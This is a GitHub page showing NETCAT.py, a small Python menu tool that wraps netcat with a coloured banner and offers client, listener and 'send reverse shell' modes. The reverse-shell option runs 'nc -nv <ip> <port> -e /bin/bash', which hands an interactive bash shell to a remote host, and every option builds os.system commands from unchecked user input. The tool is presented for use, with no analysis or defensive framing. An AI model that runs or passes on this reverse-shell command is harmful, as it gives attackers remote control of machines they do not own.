-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathNETCAT.py
More file actions
76 lines (66 loc) · 3.04 KB
/
NETCAT.py
File metadata and controls
76 lines (66 loc) · 3.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/python3
# Date Created : 4 January 2019
# Copyright 2019, Aniket.N.Bhagwate, All rights reserved.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#libraries
import os
from colorama import Fore, Back, Style
os.system("clear")
print(Fore.GREEN + Style.BRIGHT + "")
print(" --------------------------------------------------------")
print(" __ _ _ _____ _____ ____ _ _____ __ ")
print(" | _|_/\__ | \ | | ____|_ _/ ___| / \|_ _| __/\_|_ |")
print(" | |\ / | \| | _| | || | / _ \ | | \ /| |")
print(" | |/_ _\ | |\ | |___ | || |___ / ___ \| | /_ _\| |")
print(" | | \/ |_| \_|_____| |_| \____/_/ \_\_| \/ | |")
print(" |__| |__|")
print(" --------------------------------------------------------")
print(Fore.RED + Style.BRIGHT + "")
print(" [ ~ #Code By: Aniket.N.Bhagwate]")
print(Fore.GREEN + Style.BRIGHT + "")
print(" --------------------------------------------------------")
menu = """
|------------------------------------------|
| [*] CHOOSE FROM THE OPTIONS |
|------------------------------------------|
| 1 | CLIENT --> CONNECT TO HOST |
|------------------------------------------|
| 2 | SERVER --> LISTEN FOR CONNECTIONS |
|------------------------------------------|
| 3 | SEND REVERSE SHELL |
|------------------------------------------|
"""
print(menu)
choice = input("NETCAT : ")
def client():
print("[*] CLIENT MODULE")
ip_address = input("[*] ENTER THE DESTINATION IP ADDRESS : ")
port = input("[*] ENTER THE DESTINATION PORT : ")
print("[*] ESTABLISHING CONNECTION TO [ {} ] on PORT [ {} ]".format(ip_address,port))
os.system("nc -nv {} {}".format(ip_address,port))
def server():
print("[*] SERVER MODULE")
port = input("[*] ENTER PORT TO LISTEN ON : ")
os.system("nc -l -vv -p {}".format(port))
def reverse():
print("[*] REVERSE SHELL MODULE")
ip_address = input("[*] ENTER THE DESTINATION IP ADDRESS : ")
port = input("[*] ENTER THE DESTINATION PORT : ")
print("[*] SENDING SHELL TO [ {} ] on PORT [ {} ]".format(ip_address,port))
os.system("nc -nv {} {} -e /bin/bash".format(ip_address,port))
if choice =='1':
client()
elif choice =='2':
server()
elif choice =='3':
reverse()